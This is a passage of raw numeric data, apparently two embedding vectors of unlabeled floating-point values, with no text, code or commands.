60884,-0.0014957959,0.0002731437,0.021704333,-0.014978313,-0.0072921407,-0.0066395164,0.021433538,-0.0070874114,-0.0019272438,0.013948538,-0.0057491055,0.004052289,-0.0012350169,-0.0049040937,-0.0044306745,0.0014326047,-0.015504698,0.0005689636,0.0076176636,-0.011912978,0.012517075,0.003192409,0.03327415,-0.008171103,0.009411122,0.010667032,0.037011955,0.013256077,-0.018206181,0.0026812172,0.0042215595,-0.0016277477,0.015139095,-0.02793267,-0.017705953,0.0046421653,-0.005102699,0.018941496,-0.02262867,0.025422858,-0.0101727,0.00907602,-0.041118603,0.026917126,0.008630841,-0.0012275648,0.005382626,-0.00024251927,-0.0010105179,0.0106617,0.017801452,0.011473673,0.041354015,0.0021054375,-0.0014076842,0.009614974,0.003554923,-0.008141881,-0.0019150116,-0.015673615,-0.018953836,0.009093198,-0.005913084,0.0054781805,0.014887697,0.006002557,-0.014619232,0.041309617,0.009159748,0.019297248,-0.011673035,-0.013195251,0.0023214675,0.009273239,-0.0016122384,0.012232591,0.0051909722,0.00043764213,-0.019932851,-0.009843501,-0.009088999,-0.008368491,-0.0069353045,0.013337937,-0.012304998,0.00411571,-0.011316582,0.017748153,0.022097923,-0.000445172,-0.009636377,0.005251564,-0.030013226,0.0004725804,-0.0031948546,0.016332317,0.018193169,0.03094282,-0.0049840915,0.005211081,0.008599238,-0.0035558653,-0.014672304,0.00018736183,-0.022419125,0.014252266,-0.00034622234,0.0068466826,0.004246852,-0.000093282215,0.028219406,-0.0339619,-0.007217412,0.008153531,-0.002059866,-0.0241633,0.0056505874,0.009053366,0.00937081,-0.008571404,0.013383629,0.020882202,0.008957923,-0.00064269407,0.008419179,-0.0042528287,0.01814561,-0.009521919,-0.0034652303,0.0013333022,0.007244434,-0.01142929,-0.027235523,0.010688649,-0.022183657,0.0065992074,0.0017720953,-0.014401748,0.018560085,0.00056767435,-0.015992876,-0.0013124723,0.018282587,-0.0038946557,-0.0044721654,0.017828356,-0.00030978874,0.00039459192,0.01582197,0.0019885134,0.025216538,0.00269822,0.015964627,0.021455115,0.03637839,0.034947425,-0.0004689388,0.015106645,0.034863006,0.01424908,0.008916583,0.0015341865,0.021289507,0.00066311524,0.020215748,-0.02528584,0.010410839,-0.018168757,-0.00912821,0.0024534308,-0.014463107,0.007471154,0.005584485,-0.0017947025,-0.010731407,0.009471451,0.024844171,-0.015086878,-0.010287263,0.023848468,0.0021661208,-0.00042511776,0.010446865,0.011670998,0.004930996,0.0048289266,-0.0039187046,0.005306373,0.005565618,-0.0334711,-0.004605173,-0.0024027429,0.0031830692,0.036789663,-0.029316273,-0.013793369,0.020779097,-0.016394801,0.0033082352,-0.02778858,0.0070024333,-0.030018272,0.0012508092,0.034285303,0.007815739,0.011042287,0.010466557,-0.0005792611,-0.013895035,0.00763529,-0.018559353,0.02094374,-0.0019597544,0.027673122,0.003486021,-0.0029840793,-0.00050795166,-0.004984416,0.0046505574,0.0074965376,-0.002938819,-0.014068057,0.004558137,0.019957406,0.013326976,-0.004602084,-0.00014560857,-0.0013864537,0.0036116857,-0.009693758,0.0053694197,-0.014614517,-0.014317718,-0.016763464,0.027180018,0.0039902967,-0.0014968531,-0.0014822308,-0.017456606,-0.0023780928,0.0007234485,0.010054496,0.0012420773,-0.00026484852,-0.0060441736,-0.01122047,-0.002363255,0.0034015041,0.003887596,0.010423683,-0.0114042545,0.016540691,0.034847185,-0.01695264,-0.022217564,-0.005945359,0.0031322385,-0.0046041785,0.008612789,-0.019751713,-0.00045534782,0.0012068232,-0.006603829,0.028279882,-0.032134067,0.012450413,0.011583428,-0.00065344915,-0.0052328077,-0.00413905,-0.022604803,-0.0024428463,-0.0038253646,0.040288653,0.03453491,-0.009158335,0.004767662,0.008698554,0.0018462627,-0.014916004,-0.01046349,-0.0032395518,-0.015337457,-0.0049885623,-0.00768957,0.0021986652,-0.009975028,0.015017746,0.00737652,0.00094413076,-0.009158598,0.00269941,-0.018281532,-0.023980614,-0.006498524,-0.021178603,-0.009549619,-0.01737374,-0.0084783025,-0.043890286,0.0175028,-0.00051156664,0.018111829,0.020962674,0.008026612,-0.010274894,0.019637823,0.008066111,0.02584919,0.00024846944,-0.009361908,-0.012760795,0.007874613,-0.010741252,-0.0065012425,0.023300575,0.015648106,-0.005756292,0.015297569,0.012560442,-0.011444881,-0.00802604,0.0088003315,-0.017692592,0.0055059786,-0.00468808,0.0051201144,0.029416392,-0.014974179,-0.0019052523,-0.007301762,0.02311579,0.022450585,0.007682722,-0.022299645,-0.012985452,0.019164383,0.019891312,-0.011745276,0.0062824967,0.007975998,-0.0064455643,-0.015644936,0.022247843,-0.008697555,0.00559761,-0.013896306,-0.0051708743,-0.0055699428,-0.0064170025,-0.0054804576,-0.009022805,0.011177841,-0.07199211,-0.006728757,0.0016881246,-0.0050265444,-0.012312998,0.02120228,-0.03291231,0.006856303,-0.031000383,-0.00803467,-0.008613296,-0.0008963953,-0.014976428,-0.012720041,0.0012999965,-0.011268258,0.006055408,0.009538368,0.010280918,0.0126330815,0.015799023,0.019043598,0.0027031372,0.004967906,-0.01668801,-0.02011807,0.00054776325,-0.00048921705,0.006355043,0.009710719,0.010225698,0.017408606,-0.008045956,-0.017451638,0.005118748,0.005606419,-0.0024697208,0.0011657535,0.006754054,-0.013037801,-0.0045863716,-0.015775613,0.030001936,-0.008826409,0.026087575,0.04070669,-0.005966085,-0.023561867,-0.045491178,-0.011310283,0.043492813,-0.004915545,0.010277069,0.023495795,-0.017196314,0.0020792459,0.0070042154,0.010891322,0.019663068,0.0049285954,-0.011661296,0.0012496788,0.017573664,-0.018627368,0.0004223363,-0.010711618,-0.0082936585,0.0029672603,-0.026304852,0.007830137,-0.0075582615,-0.023369236,-0.017374862,-0.007050458,0.010680386,0.0071920766,-0.031392537,0.015964368,0.016162874,0.025887856,-0.00006320017,0.0017875687,0.0042008576,0.02325394,0.011858124,0.009528106,-0.0017756391,0.0066616414,0.02334807,0.023482993,-0.006860607,0.0045540603,0.004414013,-0.0009704929,0.00049512857,0.022482647,-0.02141234,-0.0023489397,-0.017694768,-0.011426282,-0.0029136124,-0.0024990677,0.012016912,0.01367997,-0.007236933,-0.0045316997,0.00044543878,0.009268391,-0.008697821,-0.0023649037,0.014475575,0.003846486,0.024165446,0.00030466422,0.006895487,0.005933476,-0.00017883921,0.011768816,-0.009153035,-0.007759605,-0.010548242,-0.014671973,-0.024903664,0.0073421593,0.021604838,0.017112013,0.017309438,-0.015961,-0.002979306,0.01713639,-0.004643811,0.019146293,0.021629965,0.030972745,0.0002280647,0.022681922,0.011106714,0.010473676,-0.012842235,0.012396448,0.00790184,-0.026033284,0.008598815,-0.0024652956,-0.00015532444,0.038109098,-0.016091157,-0.01751859,-0.008505127,-0.004354516,-0.008540226,0.0025410724,0.01990109,-0.0035008546,-0.006567621,0.010425683,0.026333297,-0.0063048983,0.010915262,-0.0013188156,-0.0009549926,0.049003802,-0.0031600958,-0.001313458,-0.011173644,0.01828079,0.02255287,-0.0046214135,-0.009693328,-0.020136705,-0.028522527,0.0085811885,-0.010078137,0.009479067,-0.019651162,-0.002792116,0.026345951,-0.0044338154,-0.0045302063,0.00301617,-0.005781385,-0.015660573,-0.004145386,-0.0018870408,-0.01131376,0.00027160835,-0.013703033,0.005155582,-0.00006602211,-0.0021358635,-0.0024639245,-0.0023856421,0.02235986,0.008378302,-0.009125471,-0.013110232,0.0054642656,-0.0008743062,0.0035795688,0.030054474,-0.024984429,0.0022386909,0.004222395,0.004147199,-0.003921043,0.014152868,-0.009424476,0.0046922024,-0.00375509,0.0117253475,0.0047232537,-0.0032996165,0.015559108,0.086696506,0.047835443,-0.016659983,-0.001411198,0.015723202,-0.0015467078,0.017755836,0.0024491402,0.018731102,0.005142827,0.0030527178,-0.0039727734,-0.004208566,-0.019037372,-0.014463354,0.017223347,0.0030963384,0.0031401312,-0.008169632,0.019816956,0.008882615,-0.013738526,0.027536063,-0.008134153,0.02642431,-0.035152853,-0.0018715519,0.014617239,-0.009761115,0.008324839,-0.003592367,-0.0051450827,0.018789016,-0.007784837,-0.012263764,-0.02425499,0.019920023,-0.000727968,-0.021478925,-0.013640655,0.026141923,0.016546415,0.00653035,-0.019932944,-0.036221325,0.021768214,0.0017362473,-0.0083375545,0.0028786564,-0.0083894385,0.019876348,0.024259608,0.010227391,-0.0004428433,0.011629639,-0.007614857,-0.010611079,-0.013942196,0.01159052,-0.014297165,0.02080898,-0.0054499293,0.0033266377,0.0070309755,0.009092619,0.014410511,-0.018466685,0.002924658,-0.050665535,-0.03638597,0.014928001,-0.016631834,0.019489476,-0.0058714245,-0.01312674,0.003361856,-0.011167823,-0.0130016105,0.00583526,0.0035623424,-0.012205596,0.022923173,-0.0019573008,0.0016392858,-0.0027380146,0.01656658,0.0067144646,0.018346356,-0.013510075,0.016134981,0.02519671,-0.010655899,-0.0055287243,-0.0028708705,-0.011016127,-0.021356529,0.006060054,-0.02063029,0.0064419364,-0.008775292,0.004379445,-0.008128698,-0.009861869,-0.013178288,-0.025559755,0.0015451997,0.0045284564,0.031265084,0.00591773,0.00817284,0.0024809677,0.025203865,0.018604832,0.011200366,0.0003383868,0.0026988226,-0.019478207,-0.024543336,-0.00037855157,-0.003353975,-0.018083753,0.0033949786,0.006731321,0.0014190957,0.005373815,-0.00070807186,-0.012865846,0.0046163867,0.009176684,0.0023686462,0.0019860903,-0.035436384,-0.00988567,-0.0012689214,-0.0034426064,-0.0064155385,0.019144285,-0.0014009676,-0.0034666827,0.0046063312,0.0073003797,-0.0031169085,-0.01585645,-0.013405,-0.0046754563,0.008081009,0.02311127,-0.010622708,0.027191192,0.014766334,-0.0051021394,-0.011630144,0.007704661,0.0073393434,-0.0034958422,-0.01403692,0.0046953,-0.0035674872,-0.023553949,0.013450375,0.019011889,-0.0018025927,-0.002644419,-0.03872361,0.009114931,0.009060208,0.006113095,-0.020062465,0.0026741691,0.008013772,-0.012286971,-0.011537926,-0.011179185,0.015999844,-0.016865559,-0.01160457,0.031621985,-0.012833045,0.018001132,-0.015146225,0.007044128,0.012911542,-0.00995089,0.03276529,0.003982871,-0.016259648,0.0056704865,0.008923448,0.0005767155,0.042429294,-0.0027334143,0.020031214,-0.006943693,0.0003240385,-0.008194534,-0.0061293645,-0.006253125,0.048325397,0.00004232922,-0.022793137,-0.015060477,0.0017254421,-0.011621159,-0.009834883,0.0031760407,0.0029356298,-0.0010803157,-0.015761264,-0.01715465,0.006371413,0.008296175,0.010451512,-0.0059380094,-0.014838213,0.008522984,0.009485061,-0.026704688,-0.026169874,-0.011489224,0.000032171676,-0.007915792,-0.0072167767,-0.026346074,0.0051190834,0.007340072,-0.004364565,-0.0046765637,0.029067725,-0.0031688025,-0.026341224,0.0055477466,0.014129002,-0.025671551,-0.012103371,0.0023304916,-0.020400632,0.013626045,0.014723858,-0.0078059277,-0.004252862,0.0012097689,-0.008028375,-0.02078793,-0.0034791625,-0.012311374,-0.01058103,0.012888075,0.0071958043,0.020315142,-0.0070680324,0.0003013686,0.005392803,-0.02701292,0.00043936964,-0.0095911445,-0.014242203,-0.013055455,0.01327989,0.004639512,-0.01864735,-0.0028991546,-0.015104567,0.005807593,-0.0061542406,-0.0070993397,-0.0047970037,0.019472621,-0.014337603,0.0075671365,-0.020180166,-0.0037579387,0.001969314,-0.014989646,0.009388365,-0.025017336,0.012304145,-0.011438815,-0.012497018,-0.019479234,0.030434987,-0.003969268,-0.017779259,0.02459774,0.011045916,0.027858028,-0.006981505,0.028148167,-0.016935593,0.06070247,-0.06088791,0.002743503,-0.00576002,0.003005671,-0.02602124,0.0034283516,-0.001713917,-0.098907664,-0.027635962,0.018416302,-0.011466159,-0.016330708,-0.009342223,0.022240357,0.0020913652,-0.01379846,-0.00064988795,-0.002315739,0.005342573,0.0027429005,0.030302057,0.011871014,-0.0018417469,0.013884741,-0.0039959615,-0.0070729167,-0.016974507,-0.0041309055,0.01706306,-0.008543681,0.0067547453,0.012915527,-0.035407864,0.01527153,0.011149544,-0.007084887,-0.0003079548,0.022611296,-0.010642337,-0.018312648,-0.018606525,0.012650864,-0.0018332215,-0.0010112411,0.00008360842,-0.0088696135,0.0070595546,-0.023714673,0.15862331,0.007963271,-0.005466145,-0.021049276,0.002038553,-0.013633196,0.0044196914,0.01796288,-0.030852832,0.008619725,-0.011430804,-0.006067927,-0.003450279,0.011009229,0.022842979,-0.012297427,0.020466736,0.16962387,0.002309327,-0.031353906,0.024654925,-0.019495927,0.022022791,-0.0023800144,0.0036068545,-0.031238299,0.0069462643,-0.015606755,0.019617403,-0.011512439,0.0009023057,0.028079659,-0.027163405,-0.01667579,-0.0044287182,0.012332009,0.00006726324,-0.012553777,-0.007832268,0.007615594,0.009318336,0.0006729264,0.0039539663,0.01471964,0.024701377,-0.023320705,-0.014698438,-0.0030930326,-0.011001716,0.0063751247,-0.010762033,0.01879622,0.006279907,-0.01660908,0.024926724,0.029441282,-0.009418823,-0.0057375035,0.0026681358,0.024654275,0.001126171,-0.003346166,-0.00030744332,0.003097384,-0.014246915,0.000088917026,0.006987374,-0.028546346,-0.025704393,0.002592623,-0.00749311,0.0003818828,-0.0098228315,0.03171582,-0.00022936564,0.016405264,-0.013390132,-0.0030581895,0.017821606,-0.013173606,0.016330322,0.01875892,-0.017516933,-0.01822257,-0.0008912141,0.0071852403,0.0030719691,0.00941469,0.01425418,0.012040767,-0.010290736,-0.0073801465,-0.017516267,-0.0020961915,-0.00090596115,0.023890486,-0.0020105853,-0.0034309963,-0.003989318,-0.008886335,-0.0027168028,0.010628189,0.0027037198,0.00889151,-0.012054044,0.0012743459,-0.015828636,0.01503818,-0.01015147,0.0076726475,0.014105633,0.010914449,-0.01458008,0.013798156,-0.004742549,-0.010346605,-0.00588098,0.01914076,-0.013362898,0.011304883,-0.011591166,-0.0126017835,0.017916584,0.01379415,-0.032906838,0.016383145,0.004179844,-0.0064510424,-0.029677227,0.0013484423,-0.02419991,-0.005995469,-0.0030759508,0.00041395702,0.0046466016,-0.013085857,-0.01602724,-0.00906931,0.0072967256,-0.007224186,-0.013641273,0.026903711,-0.0052112355,0.010867911,0.00042555193,0.011267976,0.02425957,0.004554786],[0.005747614,-0.013509632,-0.0036628281,-0.014875867,0.012158691,-0.020367263,0.010903691,0.0343027,0.01201346,-0.022001535,0.013676683,0.036390007,-0.020986918,0.0029597222,0.0023900566,0.00061237084,-0.0018767702,0.0016882158,-0.0050676465,-0.0061478885,0.01951631,-0.013230592,-0.005182739,-0.01793913,0.023698447,0.0062314607,-0.0056130835,0.0005180072,-0.012405896,0.0027435503,0.016712615,0.025119398,0.011812505,0.00041208186,0.009541356,-0.0037944687,-0.009211413,0.0065342565,0.009562968,-0.0093412725,0.020372065,0.005110826,-0.009655559,0.003949224,-0.010195189,0.002630371,-0.021721523,-0.008003573,-0.02042722,0.00067338423,-0.015429418,0.019559324,0.0017541072,-0.010377567,-0.017818326,0.018888913,-0.012614318,-0.013825958,0.01540706,0.010311721,-0.018733643,0.015802981,-0.007899223,0.011142508,0.0448042,-0.008211352,0.010935171,-0.003421534,-0.032292288,-0.0044513396,0.033410005,-0.015325515,0.009638022,-0.0050126254,0.0057936236,0.010469817,-0.013026767,-0.0053277104,-0.02237312,-0.017922137,-0.041583605,-0.010395384,0.009324236,-0.0060446635,0.009396238,0.000004161544,0.009982707,-0.002858948,-0.0038815262,-0.0074093263,-0.007857551,0.0048608114,0.0005799049,-0.007272824,0.001869389,0.008824777,0.02162178,-0.015392158,-0.007017518,-0.006820621,-0.034147862,-0.019815154,-0.024692496,0.009482474,0.004909627,-0.014350675,0.0015491947,0.014094513,0.021647925,-0.0069096214,-0.0057062856,0.018191138,-0.0034014808,-0.009501886,-0.008453119,-0.018564261,-0.002112487,0.0018300592,0.002636975,-0.00408273,0.0048985695,0.009231281,0.01233781,-0.0017733912,-0.0031842308,-0.0061016353,0.011636587,0.007664917,-0.01237655,-0.006544017,0.00017835492,0.025329143,-0.024509009,-0.0038092707,-0.018092679,0.010222874,-0.006635644,-0.007604596,0.013874929,-0.037832156,0.0029087823,-0.0040628836,0.03141913,0.008206749,0.016300373,0.0041279,0.0015032301,0.02013226,-0.00053659314,0.009248157,-0.0089593725,0.015826564,0.005722909,-0.020384187,-0.027199741,0.015370061,-0.007621195,-0.017866641,-0.0041201995,0.0056842943,-0.009373555,-0.008107257,-0.014760383,0.01020478,-0.0011477071,0.0003228119,0.015566644,0.005394748,-0.007385622,-0.031107662,0.015316067,0.009628897,0.0107567115,0.00755699,0.011263715,0.014424346,-0.021260412,-0.0017681214,-0.026653236,0.0018573246,0.015335003,-0.0010083998,-0.029376473,-0.0003280557,0.009533805,0.0061427495,0.021362184,-0.0058802213,-0.003587025,-0.0073188078,-0.010775998,-0.009223745,-0.008108305,-0.007502662,-0.006545111,-0.027809171,-0.01356327,0.14110252,-0.026194077,-0.010543435,-0.01720838,-0.008084881,0.011862842,-0.005508795,-0.012663317,0.0044671446,-0.0068518827,-0.0014141722,0.016594175,-0.0029933252,0.0011448184,-0.014770264,0.0054263975,0.011225953,0.03798921,-0.06427582,0.011226509,0.0025457116,0.00048715458,-0.0014090353,0.004101061,0.009215589,-0.020294733,-0.019522667,-0.020226253,-0.0060338564,0.014170552,0.0039930944,0.019436458,-0.01840573,0.026154324,0.02479945,-0.050238937,-0.015347946,0.008591868,-0.024620997,0.004747865,0.0064726844,0.013256963,-0.016963024,-0.008756319,0.002647906,0.018649716,0.015589863,-0.005831528,-0.02508427,0.031528987,0.011895609,0.022028157,-0.0067368313,0.010858028,-0.0047815847,0.0042469404,0.018369308,-0.0051751775,-0.016219467,0.0072455835,0.0054346984,0.00065325235,0.006710013,-0.0038423252,0.006780031,-0.015349896,0.019055065,0.022830352,0.017565928,0.022442756,-0.03965752,0.0030156747,-0.030603075,-0.02087527,0.0014027696,0.0006125887,-0.03044131,0.0027992085,-0.0018740958,0.032850727,-0.01157378,0.015067779,0.005290323,-0.002067068,0.0095144,0.008007541,-0.0152896745,-0.025451506,-0.0003717587,0.012873171,0.0049492684,0.022117658,0.0021022805,-0.005830955,-0.0065721255,0.0038741475,-0.0028446529,-0.006593625,-0.016923836,-0.022254178,0.016316744,0.012252402,-0.017482061,0.0031000162,-0.0037533443,0.013402376,0.00512454,-0.003109569,-0.003210754,-0.003110189,0.02747849,0.012789848,0.016140757,-0.0017915788,-0.007041595,0.01259335,-0.0021921739,0.011367806,-0.016296593,-0.00049709005,-0.019110741,-0.010587597,0.019168338,0.026231563,-0.01561344,-0.0048350245,-0.0028917154,0.00031905144,-0.005604713,0.02811606,-0.0011847502,0.013442823,0.0065399166,-0.0025799335,-0.016126404,0.0014857044,0.015596543,-0.00029925368,0.009134775,-0.00006253522,0.020610813,-0.00079206907,0.012815854,-0.01065592,-0.0130779445,0.0012091283,0.0025340726,0.005618671,-0.013359026,0.0016549423,-0.012037976,0.03008805,0.008304062,-0.013681928,0.0010691578,-0.0039889733,0.020416463,0.011834035,0.0009625198,-0.016161712,-0.024539221,0.009332797,-0.024903227,0.025517898,-0.008441709,0.0099895215,-0.01719833,0.05913271,-0.017564999,-0.011723892,-0.005097983,-0.02941626,-0.018097682,0.04603818,0.022337127,-0.0025625948,-0.018123725,-0.0114927925,-0.025730731,-0.01321987,0.029327605,-0.0046877745,-0.003575769,-0.017948786,0.018765697,-0.01541978,-0.015488421,0.011466429,-0.020014618,-0.024737619,0.009866794,0.005827202,0.004642181,0.00084389286,0.009653075,-0.017582882,-0.009921766,0.0015700278,-0.017132875,-0.0061424784,0.004472414,-0.02273072,0.01290645,-0.0070228716,-0.0023652958,-0.017910788,0.0042532533,0.0018347746,0.020688003,-0.025294451,0.0045250067,0.0070435056,0.016514136,0.012402903,-0.010486447,-0.010758612,0.0059290524,-0.003816912,0.00063223747,-0.015284362,0.023243822,-0.009340854,0.014004817,0.02503241,-0.03504973,0.016116375,0.0052192644,0.018451732,0.01251228,-0.029047275,0.04743977,-0.0038580438,0.026016813,-0.012578385,-0.024654206,-0.01854852,0.0016610516,-0.010560001,0.019626176,0.013599329,0.00021957363,-0.005123341,0.0098482575,-0.017524764,0.0037994199,0.0007655767,-0.008422776,-0.012117501,-0.0022912095,-0.008260156,-0.009076371,-0.0066301352,-0.006422681,0.013617354,-0.0011711491,0.002866452,0.0014768428,0.016055929,0.009403818,0.0131925605,0.008115179,0.022700755,-0.021274788,0.009858379,0.006594787,0.013714042,0.0005082907,-0.018088205,-0.010296077,0.009845454,-0.0076979725,0.007980965,0.007280416,-0.019869165,0.001786729,0.00511247,0.024667757,-0.0037708783,0.012864641,-0.0038252654,-0.0072464696,0.010399204,0.008687771,0.0014664443,-0.030816665,-0.007624868,0.028665636,0.026771657,-0.011280067,0.004489684,-0.008826306,-0.010044586,0.019649608,-0.0049955905,-0.012468481,0.0013429464,0.0036703623,0.023058167,0.017280016,0.009445185,-0.03379328,-0.020857025,-0.022586878,0.014463907,-0.013932686,0.032027096,0.0016955172,0.013266588,0.008491286,0.021309864,0.006449064,-0.0048643053,0.019498391,0.012293639,-0.0002820995,-0.012776037,0.009594402,0.020624515,-0.0006078662,-0.0025697113,-0.003153095,-0.008875111,0.018694235,-0.0017087904,-0.0192713,-0.02517304,-0.012740288,0.03678994,-0.0074293423,0.026840113,-0.020669378,-0.0168674,-0.0019262371,-0.019207062,0.07404255,-0.0003513019,-0.04897004,0.0042039477,-0.005147848,-0.0024444934,0.006233808,0.021535985,-0.015299176,0.006366411,0.029002119,0.0023344387,0.030670555,0.015613065,-0.011105192,-0.0178062,0.034249015,-0.011670088,0.0150372535,0.009762957,0.017457822,0.012093641,0.0008827983,-0.012283134,-0.026696317,0.0063988557,0.0077601415,-0.0031805374,-0.0031363163,-0.0017233177,0.004243806,0.0015726605,-0.008634076,-0.016082736,0.034845646,0.0033712385,-0.004328615,0.0129059665,-0.01794011,0.014331278,0.026380237,-0.00817171,0.005340323,0.013068738,0.0031023722,-0.006746548,-0.021418583,0.0045037847,0.02161525,-0.0015178721,-0.017062068,0.008524045,0.030397577,0.007404623,-0.01806639,-0.005773273,0.025621433,0.012811108,-0.0031220901,-0.0037450753,0.0021982284,-0.0063235215,-0.015557051,-0.018512195,-0.012718422,0.0043620183,0.010655662,0.020524561,0.008449853,-0.01786544,0.0034866687,0.004293592,-0.007391534,0.0024897777,0.01893351,0.02166083,-0.0018687424,0.025309188,0.0017272892,-0.001754288,-0.006304901,0.01760715,0.0039908723,-0.008100656,0.016410474,0.015992472,-0.0254579,-0.008132261,0.010765549,0.0022686913,0.0085216155,-0.00030588388,0.0011972315,-0.015242616,-0.008278079,0.021863708,0.004441343,0.00023620459,-0.0011820943,-0.01103961,-0.022329057,-0.0007921393,-0.019851971,0.041780278,0.006769101,0.008566346,0.0061394568,0.010385033,0.0024644877,-0.030666048,0.017354637,-0.07341663,0.025903061,0.0134864105,0.014648939,-0.0039049934,0.051407903,-0.006909916,0.022008467,-0.023537459,-0.023776054,0.0032599987,0.0034594783,0.017704686,0.012511388,0.032206133,-0.000358818,-0.015419416,-0.029332262,0.00008667231,-0.06365683,-0.017809218,0.030526211,0.0015522814,0.012622957,0.0056323633,0.0130340895,-0.006294619,0.004437263,0.0077953017,-0.027875492,-0.0017451196,0.010357373,0.026631648,0.008782683,-0.01830614,-0.025686571,-0.009020343,-0.005770888,-0.011585575,0.0023677319,0.008037224,-0.012255299,-0.015152358,0.0140237985,0.0023297316,0.015557449,-0.0027805283,0.015088587,-0.033814542,0.030593341,0.006834423,0.003914167,-0.0021283187,-0.017998867,0.0018143817,0.008697429,-0.0058180424,0.03764486,-0.0059833317,-0.011950434,-0.015939487,0.004924871,-0.015631527,-0.0042368933,0.010352272,0.007242666,0.016203223,-0.010507672,0.005931286,0.016360072,0.009135092,0.025230646,0.008759127,-0.0017144972,0.029105203,0.0019879832,0.0040879054,-0.01040224,0.012364194,-0.014226455,-0.00994149,-0.026962563,0.010978792,0.003905285,0.013541977,0.00901078,0.033308245,-0.007874907,0.017023612,-0.00057335576,-0.004064117,-0.014584686,-0.031221509,-0.0010837178,-0.007972079,0.0049691903,-0.0067529758,-0.0416891,-0.026367355,0.028224945,0.014871747,-0.017345639,-0.0027068586,0.0009995749,-0.01299371,0.008505943,-0.009653805,-0.016747884,-0.0046022437,0.010578361,-0.012308076,0.031313412,0.013019549,-0.0039301263,0.0198904,0.02535466,0.0075663403,0.0065858234,-0.0023806465,-0.013699953,0.009990353,0.005304284,0.021168904,-0.019999582,-0.011756354,-0.0071868207,-0.009659294,-0.01780918,-0.0028544825,-0.006679329,0.03412329,-0.009919134,-0.009864216,-0.01049288,-0.024939073,0.0047955387,-0.0041280603,-0.0196751,0.010201977,-0.009264134,-0.006557681,-0.024668798,0.025730647,-0.006337638,0.032260306,0.01776306,0.00025508055,-0.008312801,-0.011275321,0.019171678,0.022297537,-0.005823772,-0.00747126,-0.013971845,-0.0171364,0.016608635,0.008053155,0.006460788,-0.0012778526,-0.018049354,-0.01984001,-0.006167114,0.0039179283,-0.0016919425,0.017581884,-0.004825429,-0.03969377,0.015862407,-0.0014747389,0.019749593,0.02255447,0.0018478169,-0.027123973,-0.011951611,0.01059826,-0.025703456,-0.03097868,0.0031811746,0.0033295183,0.02362236,0.009015911,-0.01957613,-0.039978724,0.009471375,0.008105476,0.0011857145,0.019057082,-0.0030670906,0.0026595963,0.022026388,0.01492802,0.0010777089,-0.016297957,-0.03501291,-0.002764286,0.013176523,-0.010376406,0.022103706,0.023903476,0.006712823,0.047244877,-0.003873373,-0.0071638427,0.022690687,0.0024061727,0.008699316,-0.0034585267,0.014163041,-0.013801973,-0.0295995,0.017613897,-0.009514292,0.016698074,0.014748803,0.018847689,0.022303846,-0.02223408,-0.0032915405,-0.025792677,-0.015592801,0.018949982,-0.0031202019,0.019467184,0.008487731,-0.009149389,-0.011215614,0.0043549268,0.0050630393,0.005701467,0.0063630342,0.0023718297,0.009228809,-0.014798657,-0.024053255,-0.0009874392,0.00044440752,0.0022798718,0.0003837035,-0.001921632,0.0051917466,0.0047271964,0.0009519274,-0.003820094,0.021313969,-0.009660978,0.00858015,0.0077275583,0.0013904441,-0.01196106,-0.01865508,0.012488373,-0.041930344,-0.0060815383,-0.016301954,-0.005571588,0.02871251,-0.008601675,0.009434872,0.0022618365,-0.017432977,0.010936838,0.024650753,-0.025669748,-0.008711207,0.0011151765,0.021373557,0.01538546,-0.00023277766,-0.01734196,0.030162277,0.0053164153,0.021495584,0.0023253784,0.033218548,-0.00207905,0.019159148,0.012411482,-0.013857755,0.02292738,0.014742781,-0.0038165166,0.018436782,0.034481682,-0.0051312274,0.008838981,-0.023441141,-0.007207626,0.023663687,-0.009089141,-0.02067802,-0.0044354023,0.018961653,0.008208076,-0.024439069,0.022990745,-0.010412467,-0.06721977,0.012688763,0.00389203,0.009425696,0.0013094445,0.0180929,0.005095354,0.0059251282,0.013314373,-0.021176139,0.008783466,-0.007020735,-0.012180665,-0.00833327,0.0053153103,-0.027884206,-0.014172127,0.0042935056,0.017427249,-0.018508723,0.0012497253,-0.0061947587,0.0026882032,0.007607594,0.017451273,-0.01552265,-0.0017484527,0.0016388772,-0.003821307,0.046221904,0.023151774,0.006657052,-0.0074627157,-0.0076479944,0.020114804,-0.016987162,0.011714556,0.0099282265,-0.008995634,0.008750999,-0.014882956,0.004251915,-0.0028163842,0.02442306,-0.0013549426,0.0020492433,-0.013201053,-0.01592914,-0.009633063,-0.016745502,0.021845723,-0.019555688,-0.012966255,-0.00876061,-0.00809827,0.010867634,0.0044980133,-0.0005144538,0.0151801435,-0.0041960804,-0.013071246,0.008678624,-0.014487535,-0.00836127,-0.03073335,-0.013351659,0.006949241,0.014475204,0.011826779,-0.0022613776,-0.030147336,0.0016677256,0.020956159,-0.0011697441,-0.013746443,0.019726984,-0.007837047,0.0034990776,-0.0075343135,-0.02583163,-0.0057104086,-0.017655214,-0.012399601,0.008883835,-0.022750933,-0.005014469,0.008537052,0.0044025783,0.011559045,-0.009473414,0.013949983,-0.003630846,0.005742946,0.016815856,-0.0047288,0.037153594,0.02216411,0.005940515,0.014784625,0.0046887915,0.011696446,0.0021117155,-0.026927961,0.022068145,-0.0020866299,0.0006683106,0.010345207,-0.0047961804,0.030946959,0.014904633,-0.022807682,-0.006500175,0.007194957,0.010946967,0.017340558,0.008584184,0.0059924107,0.00055814156,0.04646491,0.008752314,0.03078116,-0.011192682,-0.008960673,0.005141187,0.00026643937,0.022733144,0.013100267,-0.009599454,-0.018975943,0.03820714,-0.012564706,0.0118587855,-0.0035651685,-0.012578006,0.011385145,-0.006191552,-0.00087451015,-0.013629156,-0.0021678037,0.0075078094,-0.0055704517,-0.0039365115,-0.038773593,0.011914684,0.012997023,-0.010578856,-0.014529895,0.008267565,-0.008973318,0.008239747,0.012630783,-0.002712588,0.009018634,0.001998613,-0.012409946,0.016736986,0.0017147674,-0.011535099,-0.01300273,0.012283044,-0.019780751,-0.015755638,0.006287382,-0.006085288,-0.028588258,-0.00053249835,-0.024224393,0.002910575,-0.007342629,0.011025468,-0.00042188988,-0.0032509114,-0.014162024,0.029791567,0.0050605177,-0.008865984,0.009992534,-0.013976131,0.0014533445,0.0076749893,0.019321056,0.021920567,0.009439513,0.0061742445,-0.0076135388,-0.007757666,0.0017576619,-0.009531338,-0.013547825,0.0026688536,0.0059292866,0.039059144,0.006382928,0.017983282,-0.010232248,0.002152684,0.016281057,0.017767891,-0.004907488,0.0025092156,-0.02226627,-0.00016010998,0.0071730427,-0.0113128275,-0.019508103,-0.007511079,0.011785647,-0.015293846,-0.019659342,-0.026816703,-0.014203344,0.009409901,-0.011420879,0.013459095,-0.012275941,-0.004425085,-0.03289955,-0.0054029245,0.010630249,-0.0018838407,0.011559248,-0.008209599,0.0227841